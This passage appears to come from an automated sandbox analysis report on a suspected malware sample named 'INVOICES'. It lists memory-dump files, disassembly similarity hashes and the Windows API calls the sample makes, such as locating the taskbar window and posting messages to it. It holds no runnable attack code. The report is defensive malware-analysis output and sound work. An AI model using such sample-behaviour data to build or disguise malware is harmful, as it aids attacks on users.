                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                                                                                                  • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                                  • API String ID: 3158253471-631824599
                                                                                                                                  • Opcode ID: 309a1bad2188defd7dc55977952f07fbe31c7390e1a1e53b093e747dd23c780a
                                                                                                                                  • Instruction ID: 1b01f8b2cf6c49a2c690fd88f9df1337ba5a1f02dd20bd4be5550bd6e06b28e8
                                                                                                                                  • Opcode Fuzzy Hash: 309a1bad2188defd7dc55977952f07fbe31c7390e1a1e53b093e747dd23c780a
                                                                                                                                  • Instruction Fuzzy Hash: 9AE06DB02007408BD320AF38D808B467BE0BF00704F01CA6DE842C3342EBBCD885CBA1
                                                                                                                                  APIs
                                                                                                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 007B59D7
                                                                                                                                  • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 007B59EA
                                                                                                                                    • Part of subcall function 007952EB: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00795363
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FindMessagePostSleepWindow
                                                                                                                                  • String ID: Shell_TrayWnd
                                                                                                                                  • API String ID: 529655941-2988720461
                                                                                                                                  • Opcode ID: ca0ec2cb91aea161bd2403d59ebcc0c7a91d5348d2c65000a4d0146daa121175
                                                                                                                                  • Instruction ID: de67d63a2e5be1a024c3b3e72f6ce5c9e2394434265aa5de32bb2634134344c0
                                                                                                                                  • Opcode Fuzzy Hash: ca0ec2cb91aea161bd2403d59ebcc0c7a91d5348d2c65000a4d0146daa121175
                                                                                                                                  • Instruction Fuzzy Hash: 10D0C971784711B6E6A4AB74AC0FFA66A14BB04F50F004925F659AA1D0C9E8A8108668